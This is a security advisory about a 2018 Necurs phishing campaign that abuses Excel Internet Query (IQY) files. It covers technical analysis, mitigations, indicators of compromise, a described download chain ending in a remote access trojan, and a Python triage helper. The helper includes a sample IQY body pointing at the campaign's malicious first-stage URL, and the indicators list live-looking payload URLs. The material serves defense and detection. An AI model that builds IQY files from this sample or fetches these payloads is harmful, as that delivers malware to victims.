
New Phishing Attacks Abuse Excel Internet Query Files

Severity: Medium
Published: Thu Jun 07 2018 (06/07/2018, 00:00:00 UTC)
Source: CIRCL OSINT Feed
TLP: white


AI-Powered Analysis

Last updated: 07/20/2025, 21:08:17 UTC

Technical Analysis

This threat involves a phishing campaign that abuses Microsoft Excel Internet Query Files (IQY files) to deliver malicious payloads. IQY files are legitimate Excel files that contain web query instructions, allowing Excel to fetch data from external web sources. Attackers exploit this feature by crafting malicious IQY files that, when opened by a victim, cause Excel to automatically retrieve and execute data or scripts from attacker-controlled servers. This technique is used as a payload delivery mechanism within phishing emails, often leveraging social engineering to convince users to open the malicious Excel attachments. The campaign is associated with the Necurs botnet, a well-known malware distribution network, indicating a potentially large-scale and automated phishing operation. Although no specific software vulnerabilities are exploited, the attack leverages user trust and Excel’s functionality to bypass traditional security controls. The campaign does not require prior authentication but depends on user interaction to open the malicious Excel file. No patches are available since this is an abuse of legitimate functionality rather than a software flaw. The campaign was first reported in mid-2018 and is categorized as medium severity due to the potential for credential theft, malware delivery, or further network compromise through social engineering and payload execution.

Potential Impact

For European organizations, this phishing technique poses significant risks primarily through social engineering and subsequent malware infection or credential compromise. The automatic data retrieval feature in Excel IQY files can be abused to download malicious scripts or payloads, potentially leading to unauthorized access, data exfiltration, or lateral movement within corporate networks. Organizations with a high reliance on Microsoft Office products and Excel for data analysis and reporting are particularly vulnerable. The campaign’s association with the Necurs botnet suggests potential for widespread distribution, increasing the likelihood of targeted attacks against European enterprises. The impact includes potential disruption of business operations, financial loss due to fraud or ransomware, and reputational damage. Since the attack vector involves user interaction, organizations with insufficient user awareness training or weak email filtering controls are at higher risk. Additionally, sectors with sensitive data such as finance, healthcare, and government institutions in Europe could face elevated threats due to the value of their information and strategic importance.

Mitigation Recommendations

To mitigate this threat effectively, European organizations should implement a multi-layered defense strategy beyond generic advice:

1) Enhance email filtering to detect and quarantine emails containing IQY files or suspicious Excel attachments, using advanced heuristics and sandboxing to analyze attachment behavior.
2) Configure Microsoft Office security settings to disable or restrict automatic external data connections in Excel, preventing IQY files from fetching data without explicit user consent.
3) Conduct targeted user awareness training focusing on the risks of opening unsolicited Excel attachments and recognizing phishing attempts that use legitimate file types for malicious purposes.
4) Employ endpoint detection and response (EDR) solutions capable of identifying unusual Excel network activity or script execution triggered by IQY files.
5) Maintain strict network segmentation and monitor outbound traffic for unusual connections to unknown external servers, which may indicate IQY file exploitation.
6) Implement application whitelisting to restrict execution of unauthorized scripts or macros initiated by Excel.
7) Regularly update threat intelligence feeds and integrate indicators of compromise related to Necurs and similar campaigns into security monitoring tools.

These targeted controls will reduce the attack surface and improve detection and response capabilities against this specific phishing vector.


Technical Details

UUID: 5b191ead-fac0-4f21-aaef-b9700acd0835
Original Timestamp: 1751449207

Indicators of Compromise

Ip

85.119.150.29 (clodflarechk)
103.208.86.69 (clodflarechk)

Domain

clodflarechk.com (DomainTools Risk Score 100)

Url

http://clodflarechk.com/1.dat
http://clodflarechk.com/cloud.png
http://clodflarechk.com/2.dat
http://clodflarechk.com/data.xls

Once the victim double-clicks the attachment, it downloads a file named "2.dat" from clodflarechk[.]com. 2.dat is a PowerShell script that downloads a file named "1.dat" from the same network resource. 1.dat is another script file that downloads a file named "data.xls" from the same network resource. Although the extension is ".xls," it is not an Excel file but rather an executable file that functions as a malware downloader. Once executed on the system, data.xls downloads a file named "cloud.png" from the same network resource. Cloud.png is not a graphic file as the extension suggests, but rather it is the main malware installed on the system. The main malware functions as a remote access Trojan (RAT) that gives attackers control of the compromised system.
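Two of the mitigations above (restricting Excel's external data connections and EDR detection of IQY-triggered activity) and the download chain described for these URLs reduce to two checks a defender can automate: what an IQY attachment will make Excel fetch, and whether a retrieved payload is what its extension claims. The following Python is an added example, not code from the feed or from the linked report; the allowlist host and the sample IQY body are constructed assumptions.

```python
"""Triage helpers for Excel Internet Query (.iqy) attachments.
An IQY file is plain text: line 1 is the query type ("WEB"), line 2 the
format version, line 3 the URL Excel will fetch; further lines are
key=value options. parse_iqy() extracts that URL and records what a mail
filter or EDR rule would act on; extension_matches_content() checks a
downloaded payload's leading bytes against the extension it claims."""
import ipaddress
import os
from urllib.parse import urlparse

# Assumed allowlist for this example; a deployment lists its own endpoints.
ALLOWED_HOSTS = {"reports.corp.example"}
# Leading bytes implied by the extensions that appear in this campaign.
MAGIC = {
    ".xls": b"\xd0\xcf\x11\xe0",   # OLE2 compound document (legacy Excel)
    ".png": b"\x89PNG\r\n\x1a\n",
}

def parse_iqy(text):
    """Return (url, options, findings) for one IQY file body."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not a WEB internet query file")
    url = lines[2]
    options = {}
    for ln in lines[3:]:               # e.g. Selection=AllTables
        key, _, value = ln.partition("=")
        options[key.strip()] = value.strip()
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    findings = []
    if parsed.scheme != "https":
        findings.append("cleartext transport")
    if host not in ALLOWED_HOSTS:
        findings.append("host not allowlisted")
    try:
        ipaddress.ip_address(host)
        findings.append("raw IP host")
    except ValueError:
        pass
    return url, options, findings

def extension_matches_content(filename, data):
    """False when the body lacks the magic bytes its extension implies,
    e.g. a data.xls that really starts with an MZ executable header."""
    expected = MAGIC.get(os.path.splitext(filename)[1].lower())
    return expected is None or data.startswith(expected)

# Constructed sample: a query pointing at the campaign's first-stage URL.
SAMPLE_IQY = "WEB\n1\nhttp://clodflarechk.com/2.dat\n\nSelection=AllTables\n"
```

A gateway rule would quarantine any IQY whose findings list is non-empty, and an EDR check on Excel's child downloads would alert when extension_matches_content() returns False.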

Link

https://myonlinesecurity.co.uk/necurs-delivering-flawed-ammy-rat-via-iqy-excel-web-query-files/

Threat ID: 68692e906f40f0eb72ae1d8a

Added to database: 7/5/2025, 1:54:24 PM

Last enriched: 7/20/2025, 9:08:17 PM

Last updated: 8/16/2025, 5:13:53 PM
